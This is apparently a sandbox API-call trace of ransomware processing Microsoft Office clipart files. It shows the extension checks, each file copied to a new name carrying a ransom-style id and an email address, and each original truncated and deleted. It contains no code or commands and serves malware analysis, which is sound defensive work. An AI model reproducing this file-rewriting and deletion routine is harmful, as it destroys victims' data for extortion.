	[0161.065] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.065] lstrlenW (lpString=".xlsx") returned 5
	[0161.065] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0161.065] lstrlenW (lpString=".ppt") returned 4
	[0161.065] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.065] lstrlenW (lpString=".zip") returned 4
	[0161.065] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.065] lstrlenW (lpString=".rar") returned 4
	[0161.065] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.065] lstrlenW (lpString=".bz2") returned 4
	[0161.065] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.065] lstrlenW (lpString=".7z") returned 3
	[0161.065] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.065] lstrlenW (lpString=".dbf") returned 4
	[0161.065] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.065] lstrlenW (lpString=".1cd") returned 4
	[0161.065] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.065] lstrlenW (lpString=".jpg") returned 4
	[0161.065] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.066] lstrlenW (lpString=".doc") returned 4
	[0161.066] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.066] lstrlenW (lpString=".docx") returned 5
	[0161.066] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0161.066] lstrlenW (lpString=".pdf") returned 4
	[0161.066] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.066] lstrlenW (lpString=".xls") returned 4
	[0161.066] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.066] lstrlenW (lpString=".xlsx") returned 5
	[0161.066] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0161.066] lstrlenW (lpString=".ppt") returned 4
	[0161.066] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.066] lstrlenW (lpString=".zip") returned 4
	[0161.066] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.066] lstrlenW (lpString=".rar") returned 4
	[0161.066] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.066] lstrlenW (lpString=".bz2") returned 4
	[0161.066] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.066] lstrlenW (lpString=".7z") returned 3
	[0161.066] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.066] lstrlenW (lpString=".dbf") returned 4
	[0161.066] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.066] lstrlenW (lpString=".1cd") returned 4
	[0161.066] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.066] lstrlenW (lpString=".jpg") returned 4
	[0161.067] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.067] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.067] lstrlenW (lpString="J0107280.WMF") returned 12
	[0161.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107280.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.067] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=11108) returned 1
	[0161.067] CloseHandle (hObject=0x388) returned 1
	[0161.067] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107280.wmf")) returned 0x20
	[0161.067] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107280.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107280.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.068] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.068] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107280.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0161.076] GetLastError () returned 0x0
	[0161.077] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2b64, lpOverlapped=0x0) returned 1
	[0161.078] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2b70, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2b70, lpOverlapped=0x0) returned 1
	[0161.079] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.079] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.080] SetEndOfFile (hFile=0x3d0) returned 1
	[0161.080] CloseHandle (hObject=0x3d0) returned 1
	[0161.080] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.080] SetEndOfFile (hFile=0x388) returned 1
	[0161.082] CloseHandle (hObject=0x388) returned 1
	[0161.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.082] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107280.wmf")) returned 1
	[0161.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.083] lstrlenW (lpString=".doc") returned 4
	[0161.083] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.083] lstrlenW (lpString=".docx") returned 5
	[0161.083] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0161.083] lstrlenW (lpString=".pdf") returned 4
	[0161.083] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.083] lstrlenW (lpString=".xls") returned 4
	[0161.083] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.083] lstrlenW (lpString=".xlsx") returned 5
	[0161.083] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0161.083] lstrlenW (lpString=".ppt") returned 4
	[0161.083] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.083] lstrlenW (lpString=".zip") returned 4
	[0161.083] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.083] lstrlenW (lpString=".rar") returned 4
	[0161.083] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.083] lstrlenW (lpString=".bz2") returned 4
	[0161.083] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.083] lstrlenW (lpString=".7z") returned 3
	[0161.083] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.084] lstrlenW (lpString=".dbf") returned 4
	[0161.084] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.084] lstrlenW (lpString=".1cd") returned 4
	[0161.084] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.084] lstrlenW (lpString=".jpg") returned 4
	[0161.084] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.084] lstrlenW (lpString=".doc") returned 4
	[0161.084] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.084] lstrlenW (lpString=".docx") returned 5
	[0161.084] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0161.084] lstrlenW (lpString=".pdf") returned 4
	[0161.084] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.084] lstrlenW (lpString=".xls") returned 4
	[0161.084] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.084] lstrlenW (lpString=".xlsx") returned 5
	[0161.084] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0161.084] lstrlenW (lpString=".ppt") returned 4
	[0161.084] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.084] lstrlenW (lpString=".zip") returned 4
	[0161.084] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.084] lstrlenW (lpString=".rar") returned 4
	[0161.084] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.084] lstrlenW (lpString=".bz2") returned 4
	[0161.084] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.084] lstrlenW (lpString=".7z") returned 3
	[0161.084] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.085] lstrlenW (lpString=".dbf") returned 4
	[0161.085] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.085] lstrlenW (lpString=".1cd") returned 4
	[0161.085] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 63
	[0161.085] lstrlenW (lpString=".jpg") returned 4
	[0161.085] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.085] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.085] lstrlenW (lpString="J0107282.WMF") returned 12
	[0161.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107282.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.086] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=14132) returned 1
	[0161.086] CloseHandle (hObject=0x388) returned 1
	[0161.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107282.wmf")) returned 0x20
	[0161.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107282.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107282.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.086] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.086] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107282.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0161.087] GetLastError () returned 0x0
	[0161.087] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3734, lpOverlapped=0x0) returned 1
	[0161.499] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3740, lpOverlapped=0x0) returned 1
	[0161.500] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.500] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.500] SetEndOfFile (hFile=0x3d0) returned 1
	[0161.500] CloseHandle (hObject=0x3d0) returned 1
	[0161.500] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.500] SetEndOfFile (hFile=0x388) returned 1
	[0161.503] CloseHandle (hObject=0x388) returned 1
	[0161.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.511] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107282.wmf")) returned 1
	[0161.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.521] lstrlenW (lpString=".doc") returned 4
	[0161.521] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.521] lstrlenW (lpString=".docx") returned 5
	[0161.521] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.521] lstrlenW (lpString=".pdf") returned 4
	[0161.521] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.521] lstrlenW (lpString=".xls") returned 4
	[0161.521] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.521] lstrlenW (lpString=".xlsx") returned 5
	[0161.521] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.521] lstrlenW (lpString=".ppt") returned 4
	[0161.521] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.522] lstrlenW (lpString=".zip") returned 4
	[0161.522] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.522] lstrlenW (lpString=".rar") returned 4
	[0161.522] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.522] lstrlenW (lpString=".bz2") returned 4
	[0161.522] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.522] lstrlenW (lpString=".7z") returned 3
	[0161.522] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.522] lstrlenW (lpString=".dbf") returned 4
	[0161.522] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.522] lstrlenW (lpString=".1cd") returned 4
	[0161.522] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.522] lstrlenW (lpString=".jpg") returned 4
	[0161.522] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.522] lstrlenW (lpString=".doc") returned 4
	[0161.522] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.522] lstrlenW (lpString=".docx") returned 5
	[0161.522] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.522] lstrlenW (lpString=".pdf") returned 4
	[0161.522] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.522] lstrlenW (lpString=".xls") returned 4
	[0161.522] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.522] lstrlenW (lpString=".xlsx") returned 5
	[0161.522] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.522] lstrlenW (lpString=".ppt") returned 4
	[0161.522] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.523] lstrlenW (lpString=".zip") returned 4
	[0161.523] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.523] lstrlenW (lpString=".rar") returned 4
	[0161.523] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.523] lstrlenW (lpString=".bz2") returned 4
	[0161.523] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.523] lstrlenW (lpString=".7z") returned 3
	[0161.523] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.523] lstrlenW (lpString=".dbf") returned 4
	[0161.523] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.523] lstrlenW (lpString=".1cd") returned 4
	[0161.523] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 63
	[0161.523] lstrlenW (lpString=".jpg") returned 4
	[0161.523] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.523] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.523] lstrlenW (lpString="J0107350.WMF") returned 12
	[0161.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107350.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.549] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=23672) returned 1
	[0161.549] CloseHandle (hObject=0x388) returned 1
	[0161.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107350.wmf")) returned 0x20
	[0161.580] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107350.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107350.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.580] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.580] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107350.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.581] GetLastError () returned 0x0
	[0161.581] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x5c78, lpOverlapped=0x0) returned 1
	[0161.597] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x5c80, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x5c80, lpOverlapped=0x0) returned 1
	[0161.598] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.598] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.598] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.598] CloseHandle (hObject=0x3c4) returned 1
	[0161.598] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.598] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.600] CloseHandle (hObject=0x3f0) returned 1
	[0161.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107350.wmf")) returned 1
	[0161.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.601] lstrlenW (lpString=".doc") returned 4
	[0161.601] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.601] lstrlenW (lpString=".docx") returned 5
	[0161.601] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0161.601] lstrlenW (lpString=".pdf") returned 4
	[0161.601] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.601] lstrlenW (lpString=".xls") returned 4
	[0161.601] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.601] lstrlenW (lpString=".xlsx") returned 5
	[0161.601] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0161.602] lstrlenW (lpString=".ppt") returned 4
	[0161.602] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.602] lstrlenW (lpString=".zip") returned 4
